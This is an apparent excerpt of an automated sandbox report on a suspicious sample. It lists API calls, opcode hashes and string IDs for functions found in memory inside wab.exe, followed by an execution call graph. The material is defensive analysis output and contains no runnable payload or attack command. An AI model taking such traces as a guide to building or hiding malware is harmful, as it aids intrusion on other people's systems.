                                            • Opcode Fuzzy Hash: 6acb1736ab0111dc8517c5fa2cbcd2f3284da9e8a3f5fa4e9e0b88b045204096
                                            • Instruction Fuzzy Hash: B3F04F31904118BBDB129F91DC0AFADBFFDEF08361F004165F905A6250DF35A945CA90
                                            APIs
                                            • GetEnvironmentStringsW.KERNEL32 ref: 2439715C
                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 2439717F
                                              • Part of subcall function 243956D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 24395702
                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 243971A5
                                            • _free.LIBCMT ref: 243971B8
                                            • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 243971C7
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.3405736449.0000000024391000.00000040.00001000.00020000.00000000.sdmp, Offset: 24390000, based on PE: true
                                            • Associated: 00000009.00000002.3405719415.0000000024390000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.3405736449.00000000243A6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_24390000_wab.jbxd
                                            Similarity
                                            • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                            • String ID:
                                            • API String ID: 336800556-0
                                            • Opcode ID: c2aa4f5eb9ab500a49c455f37bb13f3b8e82ddc5226982ffdeb94bca681d456d
                                            • Instruction ID: 8f6c2c155d800af955891b95192f7ddc378bee0bbe306f5f80a90a1114773791
                                            • Opcode Fuzzy Hash: c2aa4f5eb9ab500a49c455f37bb13f3b8e82ddc5226982ffdeb94bca681d456d
                                            • Instruction Fuzzy Hash: 8601A273602A16FF27120ABA5C8DD7B6EADEEC69A03140569FE14D7384EF759C0281B4
                                            APIs
                                            • GetLastError.KERNEL32(00000000,?,00000000,2439636D,24395713,00000000,?,24392249,?,?,24391D66,00000000,?,?,00000000), ref: 24395B7F
                                            • _free.LIBCMT ref: 24395BB4
                                            • _free.LIBCMT ref: 24395BDB
                                            • SetLastError.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 24395BE8
                                            • SetLastError.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 24395BF1
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.3405736449.0000000024391000.00000040.00001000.00020000.00000000.sdmp, Offset: 24390000, based on PE: true
                                            • Associated: 00000009.00000002.3405719415.0000000024390000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.3405736449.00000000243A6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_24390000_wab.jbxd
                                            Similarity
                                            • API ID: ErrorLast$_free
                                            • String ID:
                                            • API String ID: 3170660625-0
                                            • Opcode ID: c1e45e47e1856adb055693cafe26c01c78245491e062f0fb7647a13a33a0405d
                                            • Instruction ID: 1b6359a47dd2b13fbede20773093804d42f602652c058d28771b91191878dda2
                                            • Opcode Fuzzy Hash: c1e45e47e1856adb055693cafe26c01c78245491e062f0fb7647a13a33a0405d
                                            • Instruction Fuzzy Hash: 34012833245A02F7E30366786C85D2F2AEEDFD55707100028FD17E2245EF79C9824164
                                            APIs
                                            • lstrlenW.KERNEL32(?,?,?,?,?,243910DF,?,?,?,00000000), ref: 24391E9A
                                            • lstrcatW.KERNEL32(?,?), ref: 24391EAC
                                            • lstrlenW.KERNEL32(?,?,243910DF,?,?,?,00000000), ref: 24391EB3
                                            • lstrlenW.KERNEL32(?,?,243910DF,?,?,?,00000000), ref: 24391EC8
                                            • lstrcatW.KERNEL32(?,243910DF), ref: 24391ED3
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.3405736449.0000000024391000.00000040.00001000.00020000.00000000.sdmp, Offset: 24390000, based on PE: true
                                            • Associated: 00000009.00000002.3405719415.0000000024390000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.3405736449.00000000243A6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_24390000_wab.jbxd
                                            Similarity
                                            • API ID: lstrlen$lstrcat
                                            • String ID:
                                            • API String ID: 493641738-0
                                            • Opcode ID: 5234c0a5d23c8aa774caebc4fe22fe06a6b6abf16863f7b17e16da2af4b57bf0
                                            • Instruction ID: 062e10d8c948230afc15e2d45bd82c92a048cf597e5322e7527a07569063efd3
                                            • Opcode Fuzzy Hash: 5234c0a5d23c8aa774caebc4fe22fe06a6b6abf16863f7b17e16da2af4b57bf0
                                            • Instruction Fuzzy Hash: B9F089375011107AE7222719FC85E7F7B7CEFC9A60B040019F60C971909F55685296B5
                                            APIs
                                            • _free.LIBCMT ref: 243991D0
                                              • Part of subcall function 2439571E: HeapFree.KERNEL32(00000000,00000000,?,2439924F,?,00000000,?,00000000,?,24399276,?,00000007,?,?,24397E5A,?), ref: 24395734
                                              • Part of subcall function 2439571E: GetLastError.KERNEL32(?,?,2439924F,?,00000000,?,00000000,?,24399276,?,00000007,?,?,24397E5A,?,?), ref: 24395746
                                            • _free.LIBCMT ref: 243991E2
                                            • _free.LIBCMT ref: 243991F4
                                            • _free.LIBCMT ref: 24399206
                                            • _free.LIBCMT ref: 24399218
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.3405736449.0000000024391000.00000040.00001000.00020000.00000000.sdmp, Offset: 24390000, based on PE: true
                                            • Associated: 00000009.00000002.3405719415.0000000024390000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.3405736449.00000000243A6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_24390000_wab.jbxd
                                            Similarity
                                            • API ID: _free$ErrorFreeHeapLast
                                            • String ID:
                                            • API String ID: 776569668-0
                                            • Opcode ID: 616acadca9378ee49ece26198404fde57ff4f54824433ffade4736163c3a3d8d
                                            • Instruction ID: 9c47d4d7b4027586c462a435dc1ea8f0b1c8fa7a6781723a41032f0626224d62
                                            • Opcode Fuzzy Hash: 616acadca9378ee49ece26198404fde57ff4f54824433ffade4736163c3a3d8d
                                            • Instruction Fuzzy Hash: A3F049739542649BD715DB58E6C5C6B7FEEFF243207600805F949EB604CA35F8808B64
                                            APIs
                                            • GetModuleFileNameA.KERNEL32(00000000,C:\Program Files (x86)\windows mail\wab.exe,00000104), ref: 24394C1D
                                            • _free.LIBCMT ref: 24394CE8
                                            • _free.LIBCMT ref: 24394CF2
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.3405736449.0000000024391000.00000040.00001000.00020000.00000000.sdmp, Offset: 24390000, based on PE: true
                                            • Associated: 00000009.00000002.3405719415.0000000024390000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.3405736449.00000000243A6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_24390000_wab.jbxd
                                            Similarity
                                            • API ID: _free$FileModuleName
                                            • String ID: C:\Program Files (x86)\windows mail\wab.exe
                                            • API String ID: 2506810119-3377118234
                                            • Opcode ID: 4783e0edd5b01139c3ed83fe2bd862ee34eb14620394dc0bef053266e23a5044
                                            • Instruction ID: 87ec98eac0f480ef5ccfbc1857002f8c392dbff74b9c528362edd6957a25eb0b
                                            • Opcode Fuzzy Hash: 4783e0edd5b01139c3ed83fe2bd862ee34eb14620394dc0bef053266e23a5044
                                            • Instruction Fuzzy Hash: 1E31A571A45258FFDB12DF99C980D9EBBFCEFA9720F104196E904A7204D6718A41CF50
                                            APIs
                                              • Part of subcall function 24395AF6: GetLastError.KERNEL32(?,?,24396C6C), ref: 24395AFA
                                              • Part of subcall function 24395AF6: _free.LIBCMT ref: 24395B2D
                                              • Part of subcall function 24395AF6: SetLastError.KERNEL32(00000000,?,?,24396C6C), ref: 24395B6E
                                              • Part of subcall function 24395AF6: _abort.LIBCMT ref: 24395B74
                                              • Part of subcall function 24396D7E: _abort.LIBCMT ref: 24396DB0
                                              • Part of subcall function 24396D7E: _free.LIBCMT ref: 24396DE4
                                              • Part of subcall function 243969F3: GetOEMCP.KERNEL32(00000000,?,?,24396C7C,?), ref: 24396A1E
                                            • _free.LIBCMT ref: 24396CD7
                                            • _free.LIBCMT ref: 24396D0D
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.3405736449.0000000024391000.00000040.00001000.00020000.00000000.sdmp, Offset: 24390000, based on PE: true
                                            • Associated: 00000009.00000002.3405719415.0000000024390000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.3405736449.00000000243A6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_24390000_wab.jbxd
                                            Similarity
                                            • API ID: _free$ErrorLast_abort
                                            • String ID: X-S$$X-S$C
                                            • API String ID: 2991157371-1819146040
                                            • Opcode ID: 88f7f2835edf405cd05619a148a62667ea8b3f16d5bc4f748f996274dfd82d4d
                                            • Instruction ID: 2fe2da472a99c76f37f838e23e952d6ec465abe488e09cc459886e05d132e428
                                            • Opcode Fuzzy Hash: 88f7f2835edf405cd05619a148a62667ea8b3f16d5bc4f748f996274dfd82d4d
                                            • Instruction Fuzzy Hash: 7A313932D05288AFEB02CF69C680B9DBBF5EF00720F250199F8149B291EB759E40CF50
                                            APIs
                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,00000100,00000020,00000000,00000000,5EFC4D8B,00000100,24396FFD,00000000,00000001,00000020,00000100,?,5EFC4D8B,00000000), ref: 24398731
                                            • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 243987BA
                                            • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 243987CC
                                            • __freea.LIBCMT ref: 243987D5
                                              • Part of subcall function 243956D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 24395702
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.3405736449.0000000024391000.00000040.00001000.00020000.00000000.sdmp, Offset: 24390000, based on PE: true
                                            • Associated: 00000009.00000002.3405719415.0000000024390000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.3405736449.00000000243A6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_24390000_wab.jbxd
                                            Similarity
                                            • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                                            • String ID:
                                            • API String ID: 2652629310-0
                                            • Opcode ID: 6313b78ca06fadc79999ddd46e5a6d469dbb7c40db1aa9b0e468b9d938bc3a48
                                            • Instruction ID: f6415b3e88c75319f792acbbd3e4f5e413cdaea36638a9f12b715599203a7615
                                            • Opcode Fuzzy Hash: 6313b78ca06fadc79999ddd46e5a6d469dbb7c40db1aa9b0e468b9d938bc3a48
                                            • Instruction Fuzzy Hash: 15319032A1021AABDF198F65CC85DAF7BE9EF84614F110168FD05DB150EB35DD51CB90
                                            APIs
                                            • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,24391D66,00000000,00000000,?,24395C88,24391D66,00000000,00000000,00000000,?,24395E85,00000006,FlsSetValue), ref: 24395D13
                                            • GetLastError.KERNEL32(?,24395C88,24391D66,00000000,00000000,00000000,?,24395E85,00000006,FlsSetValue,2439E190,FlsSetValue,00000000,00000364,?,24395BC8), ref: 24395D1F
                                            • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,24395C88,24391D66,00000000,00000000,00000000,?,24395E85,00000006,FlsSetValue,2439E190,FlsSetValue,00000000), ref: 24395D2D
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.3405736449.0000000024391000.00000040.00001000.00020000.00000000.sdmp, Offset: 24390000, based on PE: true
                                            • Associated: 00000009.00000002.3405719415.0000000024390000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.3405736449.00000000243A6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_24390000_wab.jbxd
                                            Similarity
                                            • API ID: LibraryLoad$ErrorLast
                                            • String ID:
                                            • API String ID: 3177248105-0
                                            • Opcode ID: b11b6560b7d8a4b1f5f865c6f48c1ef9a45dba141e53e484b24546646b39a2a0
                                            • Instruction ID: b58d5f942b925e893e6f73400d8bee47beb0e5f243aaef41e7c9a76516d92707
                                            • Opcode Fuzzy Hash: b11b6560b7d8a4b1f5f865c6f48c1ef9a45dba141e53e484b24546646b39a2a0
                                            • Instruction Fuzzy Hash: 780188377156227BD7124E689C4DE5677DCEF097A17140620F90AE72C0DB35D545CAD0
                                            APIs
                                            • _free.LIBCMT ref: 2439655C
                                              • Part of subcall function 243962BC: IsProcessorFeaturePresent.KERNEL32(00000017,243962AB,00000000,?,?,?,?,00000016,?,?,243962B8,00000000,00000000,00000000,00000000,00000000), ref: 243962BE
                                              • Part of subcall function 243962BC: GetCurrentProcess.KERNEL32(C0000417), ref: 243962E0
                                              • Part of subcall function 243962BC: TerminateProcess.KERNEL32(00000000), ref: 243962E7
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.3405736449.0000000024391000.00000040.00001000.00020000.00000000.sdmp, Offset: 24390000, based on PE: true
                                            • Associated: 00000009.00000002.3405719415.0000000024390000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.3405736449.00000000243A6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_24390000_wab.jbxd
                                            Similarity
                                            • API ID: Process$CurrentFeaturePresentProcessorTerminate_free
                                            • String ID: *?$.
                                            • API String ID: 2667617558-3972193922
                                            • Opcode ID: 45d8a64586b327f8eab7ad145b3c87db09c0e9126064bd79fff12b51639589bd
                                            • Instruction ID: 748baa31d04c4f48dd85032c83bb251ad6db87aeb6d519646b9d71d265adada0
                                            • Opcode Fuzzy Hash: 45d8a64586b327f8eab7ad145b3c87db09c0e9126064bd79fff12b51639589bd
                                            • Instruction Fuzzy Hash: 3D51C475E0120AEFDF05CFA8C880AADBBF5FF98714F24816AD854E7345E6359A01CB50
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.3405736449.0000000024391000.00000040.00001000.00020000.00000000.sdmp, Offset: 24390000, based on PE: true
                                            • Associated: 00000009.00000002.3405719415.0000000024390000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.3405736449.00000000243A6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_24390000_wab.jbxd
                                            Similarity
                                            • API ID: _strlen
                                            • String ID: : $Se.
                                            • API String ID: 4218353326-4089948878
                                            • Opcode ID: a70abbbd33418fa47f4ed48ac4096c545584c77cf093be3414735b4e2c88b945
                                            • Instruction ID: ce4e94634278248586e11c5af6c4e6d07dd638a07505dca753dfd2addb6c7216
                                            • Opcode Fuzzy Hash: a70abbbd33418fa47f4ed48ac4096c545584c77cf093be3414735b4e2c88b945
                                            • Instruction Fuzzy Hash: 85110A71A04249AFDB11CFA8D840BDEFBFCEF19214F104056E545EB252E6705B02CB65
                                            APIs
                                            • __CxxThrowException@8.LIBVCRUNTIME ref: 24392903
                                              • Part of subcall function 243935D2: RaiseException.KERNEL32(?,?,?,24392925,00000000,00000000,00000000,?,?,?,?,?,24392925,?,243A21B8), ref: 24393632
                                            • __CxxThrowException@8.LIBVCRUNTIME ref: 24392920
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.3405736449.0000000024391000.00000040.00001000.00020000.00000000.sdmp, Offset: 24390000, based on PE: true
                                            • Associated: 00000009.00000002.3405719415.0000000024390000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.3405736449.00000000243A6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_24390000_wab.jbxd
                                            Similarity
                                            • API ID: Exception@8Throw$ExceptionRaise
                                            • String ID: Unknown exception
                                            • API String ID: 3476068407-410509341
                                            • Opcode ID: f53f5b2f86f4741ac8acf5d0f249a9bcc15223551adf4a9a1d36f99de80c20bc
                                            • Instruction ID: 10b145d3382544b9399a0868b8eb068594f30c4f01a696cbb6d3ceb423abeced
                                            • Opcode Fuzzy Hash: f53f5b2f86f4741ac8acf5d0f249a9bcc15223551adf4a9a1d36f99de80c20bc
                                            • Instruction Fuzzy Hash: 20F02834A08A0C779B08A6A5EC44D6D37ECBF24650B504D71EA749E094FB30EA15C9C0
                                            APIs
                                              • Part of subcall function 24395AF6: GetLastError.KERNEL32(?,?,24396C6C), ref: 24395AFA
                                              • Part of subcall function 24395AF6: _free.LIBCMT ref: 24395B2D
                                              • Part of subcall function 24395AF6: SetLastError.KERNEL32(00000000,?,?,24396C6C), ref: 24395B6E
                                              • Part of subcall function 24395AF6: _abort.LIBCMT ref: 24395B74
                                            • _abort.LIBCMT ref: 24396DB0
                                            • _free.LIBCMT ref: 24396DE4
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.3405736449.0000000024391000.00000040.00001000.00020000.00000000.sdmp, Offset: 24390000, based on PE: true
                                            • Associated: 00000009.00000002.3405719415.0000000024390000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.3405736449.00000000243A6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_24390000_wab.jbxd
                                            Similarity
                                            • API ID: ErrorLast_abort_free
                                            • String ID: X-S$
                                            • API String ID: 289325740-3002976164
                                            • Opcode ID: 519fe4fbbb218c43bce1bc1f4428892c07ad0997d784e73f366a57f1d0951a9a
                                            • Instruction ID: 07323d289054273527baf3054cec26d04bf662215fcd1af152c8100ed258b684
                                            • Opcode Fuzzy Hash: 519fe4fbbb218c43bce1bc1f4428892c07ad0997d784e73f366a57f1d0951a9a
                                            • Instruction Fuzzy Hash: AC018032D42A72DBE7129F6C844066DF7E4FF18F20B19020AE920A72C4CB7469428FC5
                                            APIs
                                            • GetOEMCP.KERNEL32(00000000,?,?,24396C7C,?), ref: 24396A1E
                                            • GetACP.KERNEL32(00000000,?,?,24396C7C,?), ref: 24396A35
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.3405736449.0000000024391000.00000040.00001000.00020000.00000000.sdmp, Offset: 24390000, based on PE: true
                                            • Associated: 00000009.00000002.3405719415.0000000024390000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.3405736449.00000000243A6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_24390000_wab.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: |l9$
                                            • API String ID: 0-1944558359
                                            • Opcode ID: e1f030c70255a33446698a779dbf5690b5344936f1ad945f99a57795fc3e8209
                                            • Instruction ID: d5e7999f20aa9258c75dd34ed318a1591809d144d3f22ada78b6d263b7760d1b
                                            • Opcode Fuzzy Hash: e1f030c70255a33446698a779dbf5690b5344936f1ad945f99a57795fc3e8209
                                            • Instruction Fuzzy Hash: 0EF0AF718012489FD702DB64C449B6C77B8FB05735F104344F4389A1C5DBB55955CB40

                                            Execution Graph

                                            Execution Coverage:6.1%
                                            Dynamic/Decrypted Code Coverage:9.2%
                                            Signature Coverage:1.9%
                                            Total number of Nodes:2000
                                            Total number of Limit Nodes:75
                                            execution_graph 40312 441819 40315 430737 40312->40315 40314 441825 40316 430756 40315->40316 40328 43076d 40315->40328 40317 430774 40316->40317 40318 43075f 40316->40318 40330 43034a memcpy 40317->40330 40329 4169a7 11 API calls 40318->40329 40321 4307ce 40322 430819 memset 40321->40322 40331 415b2c 11 API calls 40321->40331 40322->40328 40323 43077e 40323->40321 40326 4307fa 40323->40326 40323->40328 40325 4307e9 40325->40322 40325->40328 40332 4169a7 11 API calls 40326->40332 40328->40314 40329->40328 40330->40323 40331->40325 40332->40328 37670 442ec6 19 API calls 37847 4152c6 malloc 37848 4152e2 37847->37848 37849 4152ef 37847->37849 37851 416760 11 API calls 37849->37851 37851->37848 37852 4466f4 37871 446904 37852->37871 37854 446700 GetModuleHandleA 37857 446710 __set_app_type __p__fmode __p__commode 37854->37857 37856 4467a4 37858 4467ac __setusermatherr 37856->37858 37859 4467b8 37856->37859 37857->37856 37858->37859 37872 4468f0 _controlfp 37859->37872 37861 4467bd _initterm __wgetmainargs _initterm 37862 44681e GetStartupInfoW 37861->37862 37863 446810 37861->37863 37865 446866 GetModuleHandleA 37862->37865 37873 41276d 37865->37873 37869 446896 exit 37870 44689d _cexit 37869->37870 37870->37863 37871->37854 37872->37861 37874 41277d 37873->37874 37916 4044a4 LoadLibraryW 37874->37916 37876 412785 37907 412789 37876->37907 37924 414b81 37876->37924 37879 4127c8 37930 412465 memset ??2@YAPAXI 37879->37930 37881 4127ea 37942 40ac21 37881->37942 37886 412813 37960 40dd07 memset 37886->37960 37887 412827 37965 40db69 memset 37887->37965 37891 412822 37986 4125b6 ??3@YAXPAX 37891->37986 37892 40ada2 _wcsicmp 37893 41283d 37892->37893 37893->37891 37896 412863 CoInitialize 37893->37896 37970 41268e 37893->37970 37990 4123e2 GetModuleHandleW RegisterClassW GetModuleHandleW CreateWindowExW 37896->37990 37900 41296f 37992 40b633 37900->37992 37902 412873 ShowWindow UpdateWindow GetModuleHandleW LoadAcceleratorsW GetMessageW 37908 412957 37902->37908 37913 4128ca 37902->37913 37907->37869 37907->37870 37908->37891 37909 4128d0 TranslateAcceleratorW 37910 412941 GetMessageW 37909->37910 37909->37913 37910->37908 37910->37909 37911 412909 IsDialogMessageW 37911->37910 37911->37913 37912 4128fd IsDialogMessageW 37912->37910 37912->37911 37913->37909 37913->37911 37913->37912 37914 41292b TranslateMessage DispatchMessageW 37913->37914 37915 41291f IsDialogMessageW 37913->37915 37914->37910 37915->37910 37915->37914 37917 4044f7 37916->37917 37918 4044cf GetProcAddress 37916->37918 37922 404507 MessageBoxW 37917->37922 37923 40451e 37917->37923 37919 4044e8 FreeLibrary 37918->37919 37921 4044df 37918->37921 37919->37917 37920 4044f3 37919->37920 37920->37917 37921->37919 37922->37876 37923->37876 37925 414b8a 37924->37925 37926 412794 SetErrorMode GetModuleHandleW EnumResourceTypesW 37924->37926 37996 40a804 memset 37925->37996 37926->37879 37929 414b9e GetProcAddress 37929->37926 37931 4124e0 37930->37931 37932 412505 ??2@YAPAXI 37931->37932 37933 41251c 37932->37933 37935 412521 37932->37935 38018 40e820 memset ??2@YAPAXI ??2@YAPAXI ??2@YAPAXI ??2@YAPAXI 37933->38018 38007 444722 37935->38007 37941 41259b wcscpy 37941->37881 38023 40b1ab ??3@YAXPAX ??3@YAXPAX 37942->38023 37946 40a9ce malloc memcpy ??3@YAXPAX ??3@YAXPAX 37953 40ac5c 37946->37953 37947 40ad4b 37955 40ad76 37947->37955 38047 40a9ce 37947->38047 37949 40ace7 ??3@YAXPAX 37949->37953 37953->37946 37953->37947 37953->37949 37953->37955 38027 40a8d0 37953->38027 38039 4099f4 37953->38039 37954 40a8d0 7 API calls 37954->37955 38024 40aa04 37955->38024 37956 40ada2 37957 40adc9 37956->37957 37958 40adaa 37956->37958 37957->37886 37957->37887 37958->37957 37959 40adb3 _wcsicmp 37958->37959 37959->37957 37959->37958 38052 40dce0 37960->38052 37962 40dd3a GetModuleHandleW 38057 40dba7 37962->38057 37966 40dce0 3 API calls 37965->37966 37967 40db99 37966->37967 38129 40dae1 37967->38129 38143 402f3a 37970->38143 37972 412766 37972->37891 37972->37896 37973 4126d3 _wcsicmp 37974 4126a8 37973->37974 37974->37972 37974->37973 37976 41270a 37974->37976 38177 4125f8 7 API calls 37974->38177 37976->37972 38146 411ac5 37976->38146 37987 4125da 37986->37987 37988 4125f0 37987->37988 37989 4125e6 DeleteObject 37987->37989 37991 40b1ab ??3@YAXPAX ??3@YAXPAX 37988->37991 37989->37988 37990->37902 37991->37900 37993 40b640 37992->37993 37994 40b639 ??3@YAXPAX 37992->37994 37995 40b1ab ??3@YAXPAX ??3@YAXPAX 37993->37995 37994->37993 37995->37907 37997 40a83b GetSystemDirectoryW 37996->37997 37998 40a84c wcscpy 37996->37998 37997->37998 38003 409719 wcslen 37998->38003 38001 40a881 LoadLibraryW 38002 40a886 38001->38002 38002->37926 38002->37929 38004 409724 38003->38004 38005 409739 wcscat LoadLibraryW 38003->38005 38004->38005 38006 40972c wcscat 38004->38006 38005->38001 38005->38002 38006->38005 38008 444732 38007->38008 38009 444728 DeleteObject 38007->38009 38019 409cc3 38008->38019 38009->38008 38011 412551 38012 4010f9 38011->38012 38013 401130 38012->38013 38014 401134 GetModuleHandleW LoadIconW 38013->38014 38015 401107 wcsncat 38013->38015 38016 40a7be 38014->38016 38015->38013 38017 40a7d2 38016->38017 38017->37941 38017->38017 38018->37935 38022 409bfd memset wcscpy 38019->38022 38021 409cdb CreateFontIndirectW 38021->38011 38022->38021 38023->37953 38025 40aa14 38024->38025 38026 40aa0a ??3@YAXPAX 38024->38026 38025->37956 38026->38025 38028 40a8eb 38027->38028 38029 40a8df wcslen 38027->38029 38030 40a906 ??3@YAXPAX 38028->38030 38031 40a90f 38028->38031 38029->38028 38032 40a919 38030->38032 38033 4099f4 3 API calls 38031->38033 38034 40a932 38032->38034 38035 40a929 ??3@YAXPAX 38032->38035 38033->38032 38037 4099f4 3 API calls 38034->38037 38036 40a93e memcpy 38035->38036 38036->37953 38038 40a93d 38037->38038 38038->38036 38040 409a41 38039->38040 38041 4099fb malloc 38039->38041 38040->37953 38043 409a37 38041->38043 38044 409a1c 38041->38044 38043->37953 38045 409a30 ??3@YAXPAX 38044->38045 38046 409a20 memcpy 38044->38046 38045->38043 38046->38045 38048 40a9e7 38047->38048 38049 40a9dc ??3@YAXPAX 38047->38049 38050 4099f4 3 API calls 38048->38050 38051 40a9f2 38049->38051 38050->38051 38051->37954 38076 409bca GetModuleFileNameW 38052->38076 38054 40dce6 wcsrchr 38055 40dcf5 38054->38055 38056 40dcf9 wcscat 38054->38056 38055->38056 38056->37962 38077 44db70 38057->38077 38059 40dbb4 memset memset 38079 409bca GetModuleFileNameW 38059->38079 38061 40dbfd 38080 4447d9 38061->38080 38064 40dc34 wcscpy wcscpy 38106 40d6f5 38064->38106 38065 40dc1f wcscpy 38065->38064 38068 40d6f5 3 API calls 38069 40dc73 38068->38069 38070 40d6f5 3 API calls 38069->38070 38071 40dc89 38070->38071 38072 40d6f5 3 API calls 38071->38072 38073 40dc9c EnumResourceNamesW EnumResourceNamesW wcscpy 38072->38073 38112 40da80 38073->38112 38076->38054 38078 44db77 38077->38078 38078->38059 38078->38078 38079->38061 38081 4447f4 38080->38081 38082 40dc1b 38081->38082 38083 444807 ??2@YAPAXI 38081->38083 38082->38064 38082->38065 38084 44481f 38083->38084 38085 444873 _snwprintf 38084->38085 38086 4448ab wcscpy 38084->38086 38119 44474a 8 API calls 38085->38119 38088 4448bb 38086->38088 38120 44474a 8 API calls 38088->38120 38089 4448a7 38089->38086 38089->38088 38091 4448cd 38121 44474a 8 API calls 38091->38121 38093 4448e2 38122 44474a 8 API calls 38093->38122 38095 4448f7 38123 44474a 8 API calls 38095->38123 38097 44490c 38124 44474a 8 API calls 38097->38124 38099 444921 38125 44474a 8 API calls 38099->38125 38101 444936 38126 44474a 8 API calls 38101->38126 38103 44494b 38127 44474a 8 API calls 38103->38127 38105 444960 ??3@YAXPAX 38105->38082 38107 44db70 38106->38107 38108 40d702 memset GetPrivateProfileStringW 38107->38108 38109 40d752 38108->38109 38110 40d75c WritePrivateProfileStringW 38108->38110 38109->38110 38111 40d758 38109->38111 38110->38111 38111->38068 38113 44db70 38112->38113 38114 40da8d memset 38113->38114 38115 40daac LoadStringW 38114->38115 38116 40dac6 38115->38116 38116->38115 38118 40dade 38116->38118 38128 40d76e memset GetPrivateProfileStringW WritePrivateProfileStringW memset _itow 38116->38128 38118->37891 38119->38089 38120->38091 38121->38093 38122->38095 38123->38097 38124->38099 38125->38101 38126->38103 38127->38105 38128->38116 38139 409b98 GetFileAttributesW 38129->38139 38131 40daea 38132 40db63 38131->38132 38133 40daef wcscpy wcscpy GetPrivateProfileIntW 38131->38133 38132->37892 38140 40d65d GetPrivateProfileStringW 38133->38140 38135 40db3e 38141 40d65d GetPrivateProfileStringW 38135->38141 38137 40db4f 38142 40d65d GetPrivateProfileStringW 38137->38142 38139->38131 38140->38135 38141->38137 38142->38132 38178 40eaff 38143->38178 38147 411ae2 memset 38146->38147 38148 411b8f 38146->38148 38218 409bca GetModuleFileNameW 38147->38218 38160 411a8b 38148->38160 38150 411b0a wcsrchr 38151 411b22 wcscat 38150->38151 38152 411b1f 38150->38152 38219 414770 wcscpy wcscpy wcscpy CreateFileW CloseHandle 38151->38219 38152->38151 38154 411b67 38220 402afb 38154->38220 38158 411b7f 38276 40ea13 SendMessageW memset SendMessageW 38158->38276 38161 402afb 27 API calls 38160->38161 38162 411ac0 38161->38162 38163 4110dc 38162->38163 38164 41113e 38163->38164 38169 4110f0 38163->38169 38301 40969c LoadCursorW SetCursor 38164->38301 38166 411143 38302 444a54 38166->38302 38305 4032b4 38166->38305 38167 4110f7 _wcsicmp 38167->38169 38168 411157 38170 40ada2 _wcsicmp 